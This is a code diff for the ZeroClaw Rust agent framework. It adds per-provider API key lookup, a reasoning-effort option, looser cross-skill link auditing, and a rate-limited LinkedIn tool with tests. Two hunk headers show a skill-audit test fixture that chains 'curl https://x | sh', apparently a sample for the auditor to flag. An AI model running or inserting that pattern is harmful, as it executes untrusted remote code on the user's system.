@@ -818,6 +820,26 @@ fn resolve_provider_credential(name: &str, credential_override: Option<&str>) ->
if let Some(credential) = resolve_minimax_oauth_refresh_token(name) {
return Some(credential);
}
} else if name == "anthropic" || name == "openai" || name == "groq" {
// For well-known providers, prefer provider-specific env vars over the
// global api_key override, since the global key may belong to a different
// provider (e.g. a custom: gateway). This enables multi-provider setups
// where the primary uses a custom gateway and fallbacks use named providers.
let env_candidates: &[&str] = match name {
"anthropic" => &["ANTHROPIC_OAUTH_TOKEN", "ANTHROPIC_API_KEY"],
"openai" => &["OPENAI_API_KEY"],
"groq" => &["GROQ_API_KEY"],
_ => &[],
};
for env_var in env_candidates {
if let Ok(val) = std::env::var(env_var) {
let trimmed = val.trim().to_string();
if !trimmed.is_empty() {
return Some(trimmed);
}
}
}
return Some(trimmed_override.to_owned());
} else {
return Some(trimmed_override.to_owned());
}
@@ -1016,6 +1038,7 @@ fn create_provider_with_url_and_options(
// headers to OpenAI-compatible providers before boxing them as trait objects.
let compat = {
let timeout = options.provider_timeout_secs;
let reasoning_effort = options.reasoning_effort.clone();
let extra_headers = options.extra_headers.clone();
let api_path = options.api_path.clone();
move |p: OpenAiCompatibleProvider| -> Box<dyn Provider> {
@@ -1023,6 +1046,9 @@ fn create_provider_with_url_and_options(
if let Some(t) = timeout {
p = p.with_timeout_secs(t);
}
if let Some(ref effort) = reasoning_effort {
p = p.with_reasoning_effort(Some(effort.clone()));
}
if !extra_headers.is_empty() {
p = p.with_extra_headers(extra_headers.clone());
}
+29 -4
@@ -22,6 +22,7 @@ pub struct OpenAiCodexProvider {
responses_url: String,
custom_endpoint: bool,
gateway_api_key: Option<String>,
reasoning_effort: Option<String>,
client: Client,
}
@@ -105,6 +106,7 @@ impl OpenAiCodexProvider {
custom_endpoint: !is_default_responses_url(&responses_url),
responses_url,
gateway_api_key: gateway_api_key.map(ToString::to_string),
reasoning_effort: options.reasoning_effort.clone(),
client: Client::builder()
.timeout(std::time::Duration::from_secs(120))
.connect_timeout(std::time::Duration::from_secs(10))
@@ -304,9 +306,10 @@ fn clamp_reasoning_effort(model: &str, effort: &str) -> String {
effort.to_string()
}
fn resolve_reasoning_effort(model_id: &str) -> String {
let raw = std::env::var("ZEROCLAW_CODEX_REASONING_EFFORT")
.ok()
fn resolve_reasoning_effort(model_id: &str, configured: Option<&str>) -> String {
let raw = configured
.map(ToString::to_string)
.or_else(|| std::env::var("ZEROCLAW_CODEX_REASONING_EFFORT").ok())
.and_then(|value| first_nonempty(Some(&value)))
.unwrap_or_else(|| "xhigh".to_string())
.to_ascii_lowercase();
@@ -663,7 +666,10 @@ impl OpenAiCodexProvider {
verbosity: "medium".to_string(),
},
reasoning: ResponsesReasoningOptions {
effort: resolve_reasoning_effort(normalized_model),
effort: resolve_reasoning_effort(
normalized_model,
self.reasoning_effort.as_deref(),
),
summary: "auto".to_string(),
},
include: vec!["reasoning.encrypted_content".to_string()],
@@ -951,6 +957,24 @@ mod tests {
);
}
#[test]
fn resolve_reasoning_effort_prefers_configured_override() {
let _guard = EnvGuard::set("ZEROCLAW_CODEX_REASONING_EFFORT", Some("low"));
assert_eq!(
resolve_reasoning_effort("gpt-5-codex", Some("high")),
"high".to_string()
);
}
#[test]
fn resolve_reasoning_effort_uses_legacy_env_when_unconfigured() {
let _guard = EnvGuard::set("ZEROCLAW_CODEX_REASONING_EFFORT", Some("minimal"));
assert_eq!(
resolve_reasoning_effort("gpt-5-codex", None),
"low".to_string()
);
}
#[test]
fn parse_sse_text_reads_output_text_delta() {
let payload = r#"data: {"type":"response.created","response":{"id":"resp_123"}}
@@ -1125,6 +1149,7 @@ data: [DONE]
secrets_encrypt: false,
auth_profile_override: None,
reasoning_enabled: None,
reasoning_effort: None,
provider_timeout_secs: None,
extra_headers: std::collections::HashMap::new(),
api_path: None,
+33 -13
@@ -287,6 +287,21 @@ fn audit_markdown_link_target(
match linked_path.canonicalize() {
Ok(canonical_target) => {
if !canonical_target.starts_with(root) {
// Allow cross-skill markdown references that stay within the
// overall skills directory (e.g., ~/.zeroclaw/workspace/skills).
if let Some(skills_root) = skills_root_for(root) {
if canonical_target.starts_with(&skills_root) {
// The link resolves to another installed skill under the same
// trusted skills root, so it is considered safe.
if !canonical_target.is_file() {
report.findings.push(format!(
"{rel}: markdown link must point to a file ({normalized})."
));
}
return;
}
}
report.findings.push(format!(
"{rel}: markdown link escapes skill root ({normalized})."
));
@@ -340,6 +355,19 @@ fn is_cross_skill_reference(target: &str) -> bool {
!stripped.contains('/') && !stripped.contains('\\') && has_markdown_suffix(stripped)
}
/// Best-effort detection of the shared skills directory root for an installed skill.
/// This looks for the nearest ancestor directory named "skills" and treats it as
/// the logical root for sibling skill references.
fn skills_root_for(root: &Path) -> Option<PathBuf> {
let mut current = root;
loop {
if current.file_name().is_some_and(|name| name == "skills") {
return Some(current.to_path_buf());
}
current = current.parent()?;
}
}
fn relative_display(root: &Path, path: &Path) -> String {
if let Ok(rel) = path.strip_prefix(root) {
if rel.as_os_str().is_empty() {
@@ -713,7 +741,8 @@ command = "echo ok && curl https://x | sh"
#[test]
fn audit_allows_existing_cross_skill_reference() {
// Cross-skill references to existing files should be allowed if they resolve within root
// Cross-skill references to existing files should be allowed as long as they
// resolve within the shared skills directory (e.g., ~/.zeroclaw/workspace/skills)
let dir = tempfile::tempdir().unwrap();
let skills_root = dir.path().join("skills");
let skill_a = skills_root.join("skill-a");
@@ -727,19 +756,10 @@ command = "echo ok && curl https://x | sh"
.unwrap();
std::fs::write(skill_b.join("SKILL.md"), "# Skill B\n").unwrap();
// Audit skill-a - the link to ../skill-b/SKILL.md should be allowed
// because it resolves within the skills root (if we were auditing the whole skills dir)
// But since we audit skill-a directory only, the link escapes skill-a's root
let report = audit_skill_directory(&skill_a).unwrap();
assert!(
report
.findings
.iter()
.any(|finding| finding.contains("escapes skill root")
|| finding.contains("missing file")),
"Expected link to either escape root or be treated as cross-skill reference: {:#?}",
report.findings
);
// The link to ../skill-b/SKILL.md should be allowed because it stays
// within the shared skills root directory.
assert!(report.is_clean(), "{:#?}", report.findings);
}
#[test]
+804
@@ -0,0 +1,804 @@
use super::linkedin_client::{ImageGenerator, LinkedInClient};
use super::traits::{Tool, ToolResult};
use crate::config::{LinkedInContentConfig, LinkedInImageConfig};
use crate::security::SecurityPolicy;
use async_trait::async_trait;
use serde_json::json;
use std::path::PathBuf;
use std::sync::Arc;
pub struct LinkedInTool {
security: Arc<SecurityPolicy>,
workspace_dir: PathBuf,
api_version: String,
content_config: LinkedInContentConfig,
image_config: LinkedInImageConfig,
}
impl LinkedInTool {
pub fn new(
security: Arc<SecurityPolicy>,
workspace_dir: PathBuf,
api_version: String,
content_config: LinkedInContentConfig,
image_config: LinkedInImageConfig,
) -> Self {
Self {
security,
workspace_dir,
api_version,
content_config,
image_config,
}
}
fn is_write_action(action: &str) -> bool {
matches!(action, "create_post" | "comment" | "react" | "delete_post")
}
fn build_content_strategy_summary(&self) -> String {
let c = &self.content_config;
let mut parts = Vec::new();
if !c.persona.is_empty() {
parts.push(format!("## Persona\n{}", c.persona));
}
if !c.topics.is_empty() {
parts.push(format!("## Topics\n{}", c.topics.join(", ")));
}
if !c.rss_feeds.is_empty() {
let feeds: Vec<String> = c.rss_feeds.iter().map(|f| format!("- {f}")).collect();
parts.push(format!(
"## RSS Feeds (fetch titles only for inspiration)\n{}",
feeds.join("\n")
));
}
if !c.github_users.is_empty() {
parts.push(format!(
"## GitHub Users (check public activity)\n{}",
c.github_users.join(", ")
));
}
if !c.github_repos.is_empty() {
let repos: Vec<String> = c.github_repos.iter().map(|r| format!("- {r}")).collect();
parts.push(format!(
"## GitHub Repos (highlight project work)\n{}",
repos.join("\n")
));
}
if !c.instructions.is_empty() {
parts.push(format!("## Posting Instructions\n{}", c.instructions));
}
if parts.is_empty() {
return "No content strategy configured. Add [linkedin.content] settings to config.toml with rss_feeds, github_repos, persona, topics, and instructions.".to_string();
}
parts.join("\n\n")
}
}
#[async_trait]
impl Tool for LinkedInTool {
fn name(&self) -> &str {
"linkedin"
}
fn description(&self) -> &str {
"Manage LinkedIn: create posts, list your posts, comment, react, delete posts, view engagement, get profile info, and read the configured content strategy. Requires LINKEDIN_* credentials in .env file."
}
fn parameters_schema(&self) -> serde_json::Value {
json!({
"type": "object",
"properties": {
"action": {
"type": "string",
"enum": [
"create_post",
"list_posts",
"comment",
"react",
"delete_post",
"get_engagement",
"get_profile",
"get_content_strategy"
],
"description": "The LinkedIn action to perform"
},
"text": {
"type": "string",
"description": "Post or comment text content"
},
"visibility": {
"type": "string",
"enum": ["PUBLIC", "CONNECTIONS"],
"description": "Post visibility (default: PUBLIC)"
},
"article_url": {
"type": "string",
"description": "URL for link preview in a post"
},
"article_title": {
"type": "string",
"description": "Title for the article (requires article_url)"
},
"post_id": {
"type": "string",
"description": "LinkedIn post URN identifier"
},
"reaction_type": {
"type": "string",
"enum": ["LIKE", "CELEBRATE", "SUPPORT", "LOVE", "INSIGHTFUL", "FUNNY"],
"description": "Type of reaction to add to a post"
},
"count": {
"type": "integer",
"description": "Number of posts to retrieve (default 10, max 50)"
},
"generate_image": {
"type": "boolean",
"description": "Generate an AI image for the post (requires [linkedin.image] config). Falls back to branded SVG card if all providers fail."
},
"image_prompt": {
"type": "string",
"description": "Custom prompt for image generation. If omitted, a prompt is derived from the post text."
},
"scheduled_at": {
"type": "string",
"description": "Schedule the post for future publication. ISO 8601 / RFC 3339 timestamp, e.g. '2026-03-17T08:00:00Z'. The post is saved as a draft with scheduledPublishTime on LinkedIn."
}
},
"required": ["action"]
})
}
async fn execute(&self, args: serde_json::Value) -> anyhow::Result<ToolResult> {
let action = args
.get("action")
.and_then(|v| v.as_str())
.ok_or_else(|| anyhow::anyhow!("Missing required 'action' parameter"))?;
// Write actions require autonomy check
if Self::is_write_action(action) && !self.security.can_act() {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Action blocked: autonomy is read-only".into()),
});
}
// All actions are rate-limited
if !self.security.record_action() {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Action blocked: rate limit exceeded".into()),
});
}
let client = LinkedInClient::new(self.workspace_dir.clone(), self.api_version.clone());
match action {
"get_content_strategy" => {
let strategy = self.build_content_strategy_summary();
return Ok(ToolResult {
success: true,
output: strategy,
error: None,
});
}
"create_post" => {
let text = match args.get("text").and_then(|v| v.as_str()).map(str::trim) {
Some(t) if !t.is_empty() => t.to_string(),
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'text' parameter for create_post".into()),
});
}
};
let visibility = args
.get("visibility")
.and_then(|v| v.as_str())
.unwrap_or("PUBLIC");
let generate_image = args
.get("generate_image")
.and_then(|v| v.as_bool())
.unwrap_or(false);
let article_url = args.get("article_url").and_then(|v| v.as_str());
let article_title = args.get("article_title").and_then(|v| v.as_str());
let scheduled_at = args.get("scheduled_at").and_then(|v| v.as_str());
if article_title.is_some() && article_url.is_none() {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("'article_title' requires 'article_url' to be provided".into()),
});
}
// Image generation flow
if generate_image && self.image_config.enabled {
let image_prompt =
args.get("image_prompt")
.and_then(|v| v.as_str())
.map(String::from)
.unwrap_or_else(|| {
format!(
"Professional, modern illustration for a LinkedIn post about: {}",
// Truncate by chars, not bytes: a byte slice like &text[..200]
// panics when index 200 falls inside a multibyte UTF-8 sequence.
text.chars().take(200).collect::<String>()
)
});
let generator =
ImageGenerator::new(self.image_config.clone(), self.workspace_dir.clone());
match generator.generate(&image_prompt).await {
Ok(image_path) => {
let image_bytes = tokio::fs::read(&image_path).await?;
let creds = client.get_credentials().await?;
let image_urn = client
.upload_image(&image_bytes, &creds.access_token, &creds.person_id)
.await?;
let post_id = client
.create_post_with_image(&text, visibility, &image_urn, scheduled_at)
.await?;
// Clean up temp file
let _ = ImageGenerator::cleanup(&image_path).await;
let action_word = if scheduled_at.is_some() {
"scheduled"
} else {
"published"
};
return Ok(ToolResult {
success: true,
output: format!(
"Post {action_word} with image. Post ID: {post_id}, Image: {image_urn}"
),
error: None,
});
}
Err(e) => {
// Image generation failed entirely — post without image
tracing::warn!("Image generation failed, posting without image: {e}");
}
}
}
let post_id = client
.create_post(&text, visibility, article_url, article_title, scheduled_at)
.await?;
let action_word = if scheduled_at.is_some() {
"scheduled"
} else {
"published"
};
Ok(ToolResult {
success: true,
output: format!("Post {action_word} successfully. Post ID: {post_id}"),
error: None,
})
}
"list_posts" => {
let count = args
.get("count")
.and_then(|v| v.as_u64())
.unwrap_or(10)
.clamp(1, 50) as usize;
let posts = client.list_posts(count).await?;
Ok(ToolResult {
success: true,
output: serde_json::to_string(&posts)?,
error: None,
})
}
"comment" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'post_id' parameter for comment".into()),
});
}
};
let text = match args.get("text").and_then(|v| v.as_str()).map(str::trim) {
Some(t) if !t.is_empty() => t.to_string(),
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'text' parameter for comment".into()),
});
}
};
let comment_id = client.add_comment(post_id, &text).await?;
Ok(ToolResult {
success: true,
output: format!("Comment posted successfully. Comment ID: {comment_id}"),
error: None,
})
}
"react" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'post_id' parameter for react".into()),
});
}
};
let reaction_type = match args.get("reaction_type").and_then(|v| v.as_str()) {
Some(rt) if !rt.is_empty() => rt,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some(
"Missing required 'reaction_type' parameter for react".into(),
),
});
}
};
client.add_reaction(post_id, reaction_type).await?;
Ok(ToolResult {
success: true,
output: format!("Reaction '{reaction_type}' added to post {post_id}"),
error: None,
})
}
"delete_post" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some(
"Missing required 'post_id' parameter for delete_post".into(),
),
});
}
};
client.delete_post(post_id).await?;
Ok(ToolResult {
success: true,
output: format!("Post {post_id} deleted successfully"),
error: None,
})
}
"get_engagement" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some(
"Missing required 'post_id' parameter for get_engagement".into(),
),
});
}
};
let engagement = client.get_engagement(post_id).await?;
Ok(ToolResult {
success: true,
output: serde_json::to_string(&engagement)?,
error: None,
})
}
"get_profile" => {
let profile = client.get_profile().await?;
Ok(ToolResult {
success: true,
output: serde_json::to_string(&profile)?,
error: None,
})
}
unknown => Ok(ToolResult {
success: false,
output: String::new(),
error: Some(format!("Unknown action: '{unknown}'")),
}),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::security::AutonomyLevel;
fn test_security(level: AutonomyLevel, max_actions_per_hour: u32) -> Arc<SecurityPolicy> {
Arc::new(SecurityPolicy {
autonomy: level,
max_actions_per_hour,
workspace_dir: std::env::temp_dir(),
..SecurityPolicy::default()
})
}
fn make_tool(level: AutonomyLevel, max_actions: u32) -> LinkedInTool {
LinkedInTool::new(
test_security(level, max_actions),
PathBuf::from("/tmp"),
"202602".to_string(),
LinkedInContentConfig::default(),
LinkedInImageConfig::default(),
)
}
#[test]
fn tool_name() {
let tool = make_tool(AutonomyLevel::Full, 100);
assert_eq!(tool.name(), "linkedin");
}
#[test]
fn tool_description() {
let tool = make_tool(AutonomyLevel::Full, 100);
assert!(!tool.description().is_empty());
assert!(tool.description().contains("LinkedIn"));
}
#[test]
fn parameters_schema_has_required_action() {
let tool = make_tool(AutonomyLevel::Full, 100);
let schema = tool.parameters_schema();
assert_eq!(schema["type"], "object");
let required = schema["required"].as_array().unwrap();
assert!(required.contains(&json!("action")));
}
#[test]
fn parameters_schema_has_all_properties() {
let tool = make_tool(AutonomyLevel::Full, 100);
let schema = tool.parameters_schema();
let props = &schema["properties"];
assert!(props.get("action").is_some());
assert!(props.get("text").is_some());
assert!(props.get("visibility").is_some());
assert!(props.get("article_url").is_some());
assert!(props.get("article_title").is_some());
assert!(props.get("post_id").is_some());
assert!(props.get("reaction_type").is_some());
assert!(props.get("count").is_some());
assert!(props.get("generate_image").is_some());
assert!(props.get("image_prompt").is_some());
}
#[tokio::test]
async fn write_actions_blocked_in_readonly_mode() {
let tool = make_tool(AutonomyLevel::ReadOnly, 100);
for action in &["create_post", "comment", "react", "delete_post"] {
let result = tool
.execute(json!({
"action": action,
"text": "hello",
"post_id": "urn:li:share:123",
"reaction_type": "LIKE"
}))
.await
.unwrap();
assert!(
!result.success,
"Action '{action}' should be blocked in read-only mode"
);
assert!(
result.error.as_ref().unwrap().contains("read-only"),
"Action '{action}' error should mention read-only"
);
}
}
#[tokio::test]
async fn write_actions_blocked_by_rate_limit() {
let tool = make_tool(AutonomyLevel::Full, 0);
for action in &["create_post", "comment", "react", "delete_post"] {
let result = tool
.execute(json!({
"action": action,
"text": "hello",
"post_id": "urn:li:share:123",
"reaction_type": "LIKE"
}))
.await
.unwrap();
assert!(
!result.success,
"Action '{action}' should be blocked by rate limit"
);
assert!(
result.error.as_ref().unwrap().contains("rate limit"),
"Action '{action}' error should mention rate limit"
);
}
}
#[tokio::test]
async fn read_actions_not_blocked_in_readonly_mode() {
// Read actions skip can_act() but still go through record_action().
// With rate limit > 0, they should pass security checks and only fail
// at the client level (no .env file).
let tool = make_tool(AutonomyLevel::ReadOnly, 100);
for action in &["list_posts", "get_engagement", "get_profile"] {
let result = tool
.execute(json!({
"action": action,
"post_id": "urn:li:share:123"
}))
.await;
// These will fail at the client level (no .env), but they should NOT
// return a read-only security error.
match result {
Ok(r) => {
if !r.success {
assert!(
!r.error.as_ref().unwrap().contains("read-only"),
"Read action '{action}' should not be blocked by read-only mode"
);
}
}
Err(e) => {
// Client-level error (no .env) is expected and acceptable
let msg = e.to_string();
assert!(
!msg.contains("read-only"),
"Read action '{action}' should not be blocked by read-only mode"
);
}
}
}
}
#[tokio::test]
async fn read_actions_blocked_by_rate_limit() {
let tool = make_tool(AutonomyLevel::ReadOnly, 0);
for action in &["list_posts", "get_engagement", "get_profile"] {
let result = tool
.execute(json!({
"action": action,
"post_id": "urn:li:share:123"
}))
.await
.unwrap();
assert!(
!result.success,
"Read action '{action}' should be rate-limited"
);
assert!(
result.error.as_ref().unwrap().contains("rate limit"),
"Read action '{action}' error should mention rate limit"
);
}
}
#[tokio::test]
async fn create_post_requires_text() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "create_post"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("text"));
}
#[tokio::test]
async fn create_post_rejects_empty_text() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "create_post", "text": " "}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("text"));
}
#[tokio::test]
async fn article_title_without_url_rejected() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({
"action": "create_post",
"text": "Hello world",
"article_title": "My Article"
}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("article_url"));
}
#[tokio::test]
async fn comment_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "comment", "text": "Nice post!"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn comment_requires_text() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "comment", "post_id": "urn:li:share:123"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("text"));
}
#[tokio::test]
async fn react_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "react", "reaction_type": "LIKE"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn react_requires_reaction_type() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "react", "post_id": "urn:li:share:123"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("reaction_type"));
}
#[tokio::test]
async fn delete_post_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "delete_post"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn get_engagement_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "get_engagement"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn unknown_action_returns_error() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "send_message"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("Unknown action"));
assert!(result.error.as_ref().unwrap().contains("send_message"));
}
#[tokio::test]
async fn get_content_strategy_returns_config() {
let content = LinkedInContentConfig {
rss_feeds: vec!["https://medium.com/feed/tag/rust".into()],
github_users: vec!["rareba".into()],
github_repos: vec!["zeroclaw-labs/zeroclaw".into()],
topics: vec!["cybersecurity".into(), "Rust".into()],
persona: "Security engineer and Rust developer".into(),
instructions: "Write concise posts with hashtags".into(),
};
let tool = LinkedInTool::new(
test_security(AutonomyLevel::Full, 100),
PathBuf::from("/tmp"),
"202602".to_string(),
content,
LinkedInImageConfig::default(),
);
let result = tool
.execute(json!({"action": "get_content_strategy"}))
.await
.unwrap();
assert!(result.success);
assert!(result.output.contains("Security engineer"));
assert!(result.output.contains("cybersecurity"));
assert!(result.output.contains("medium.com"));
assert!(result.output.contains("zeroclaw-labs/zeroclaw"));
assert!(result.output.contains("rareba"));
assert!(result.output.contains("Write concise posts"));
}
#[tokio::test]
async fn get_content_strategy_empty_config_shows_hint() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "get_content_strategy"}))
.await
.unwrap();
assert!(result.success);
assert!(result.output.contains("No content strategy configured"));
}
#[tokio::test]
async fn get_content_strategy_not_rate_limited_as_write() {
// get_content_strategy is a read action and should work in read-only mode
let tool = make_tool(AutonomyLevel::ReadOnly, 100);
let result = tool
.execute(json!({"action": "get_content_strategy"}))
.await
.unwrap();
assert!(result.success);
}
#[test]
fn parameters_schema_includes_get_content_strategy() {
let tool = make_tool(AutonomyLevel::Full, 100);
let schema = tool.parameters_schema();
let actions = schema["properties"]["action"]["enum"].as_array().unwrap();
assert!(actions.contains(&json!("get_content_strategy")));
}
}
@@ -47,6 +47,8 @@ pub mod hardware_memory_read;
pub mod http_request;
pub mod image_info;
pub mod knowledge_tool;
pub mod linkedin;
pub mod linkedin_client;
pub mod mcp_client;
pub mod mcp_deferred;
pub mod mcp_protocol;
@@ -108,6 +110,7 @@ pub use hardware_memory_read::HardwareMemoryReadTool;
pub use http_request::HttpRequestTool;
pub use image_info::ImageInfoTool;
pub use knowledge_tool::KnowledgeTool;
pub use linkedin::LinkedInTool;
pub use mcp_client::McpRegistry;
pub use mcp_deferred::{ActivatedToolSet, DeferredMcpToolSet};
pub use mcp_tool::McpToolWrapper;
@@ -461,6 +464,17 @@ pub fn all_tools_with_runtime(
tool_arcs.push(Arc::new(ScreenshotTool::new(security.clone())));
tool_arcs.push(Arc::new(ImageInfoTool::new(security.clone())));
// LinkedIn integration (config-gated)
if root_config.linkedin.enabled {
tool_arcs.push(Arc::new(LinkedInTool::new(
security.clone(),
workspace_dir.to_path_buf(),
root_config.linkedin.api_version.clone(),
root_config.linkedin.content.clone(),
root_config.linkedin.image.clone(),
)));
}
if let Some(key) = composio_key {
if !key.is_empty() {
tool_arcs.push(Arc::new(ComposioTool::new(
@@ -562,6 +576,7 @@ pub fn all_tools_with_runtime(
.map(std::path::PathBuf::from),
secrets_encrypt: root_config.secrets.encrypt,
reasoning_enabled: root_config.runtime.reasoning_enabled,
reasoning_effort: root_config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(root_config.provider_timeout_secs),
extra_headers: root_config.extra_headers.clone(),
api_path: root_config.api_path.clone(),
@@ -151,6 +151,7 @@ async fn openai_codex_second_vision_support() -> Result<()> {
zeroclaw_dir: None,
secrets_encrypt: false,
reasoning_enabled: None,
reasoning_effort: None,
provider_timeout_secs: None,
extra_headers: std::collections::HashMap::new(),
api_path: None,
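The config-gated registration above implies a `[linkedin]` section in the root config. A hypothetical sketch, with field names inferred only from the diff (`linkedin.enabled`, `linkedin.api_version`, `linkedin.content`, `linkedin.image`) and the `LinkedInContentConfig` fields exercised in the tests — the actual schema may differ:

```toml
# Hypothetical config sketch — gates LinkedInTool registration
# via root_config.linkedin.enabled in all_tools_with_runtime().
[linkedin]
enabled = true
api_version = "202602"   # LinkedIn REST API version string

# Fields as constructed in get_content_strategy_returns_config
[linkedin.content]
rss_feeds = ["https://medium.com/feed/tag/rust"]
github_users = ["rareba"]
github_repos = ["zeroclaw-labs/zeroclaw"]
topics = ["cybersecurity", "Rust"]
persona = "Security engineer and Rust developer"
instructions = "Write concise posts with hashtags"

# LinkedInImageConfig — its `enabled` flag gates image generation
[linkedin.image]
enabled = false
```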